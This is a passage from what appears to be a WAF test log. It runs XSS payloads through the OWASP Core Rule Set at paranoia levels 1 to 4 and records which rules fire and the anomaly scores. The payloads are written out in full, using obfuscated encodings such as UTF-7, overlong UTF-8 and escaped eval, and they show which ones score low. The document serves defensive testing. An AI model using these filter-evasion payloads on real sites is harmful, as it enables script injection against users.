942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 13
--- Paranoia Level 4 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 26
****** payload-118 ********
Payload:
payload=+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
Total Incoming Score: 0
--- Paranoia Level 3 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 13
--- Paranoia Level 4 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 26
****** payload-119 ********
Payload:
payload=<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"></a>
--- Paranoia Level 1 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
****** payload-120 ********
Payload:
payload=<iframe sandbox src="//portswigger-labs.net"></iframe></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-121 ********
Payload:
payload=%C0%BCscript>alert(1)</script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 20
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 33
****** payload-122 ********
Payload:
payload=%E0%80%BCscript>alert(1)</script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 23
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 36
****** payload-123 ********
Payload:
payload=%F0%80%80%BCscript>alert(1)</script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 26
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 39
****** payload-124 ********
Payload:
payload=%F8%80%80%80%BCscript>alert(1)</script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 26
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 39
****** payload-125 ********
Payload:
payload=%FC%80%80%80%80%BCscript>alert(1)</script></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 26
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 39
****** payload-126 ********
Payload:
payload=<script>\u0061lert(1)</script></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
****** payload-127 ********
Payload:
payload=<script>\u{61}lert(1)</script></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
****** payload-128 ********
Payload:
payload=<script>\u{0000000061}lert(1)</script></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
****** payload-129 ********
Payload:
payload=<script>eval('\x61lert(1)')</script></a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-130 ********
Payload:
payload=<script>eval('\141lert(1)')</script>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 45
--- Paranoia Level 3 ---
942490 Detects classic SQL injection probings 3/3
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 66
--- Paranoia Level 4 ---
942490 Detects classic SQL injection probings 3/3
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 84
****** payload-131 ********
Payload:
payload=<script>eval('alert(\061)')</script>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 40
--- Paranoia Level 3 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-132 ********
Payload:
payload=<script>eval('alert(\61)')</script></a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
934100 Node.js Injection Attack
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-133 ********
Payload:
payload=<a href="&amp;#106;avascript:alert(1)">XSS</a><a href="&amp;#106avascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
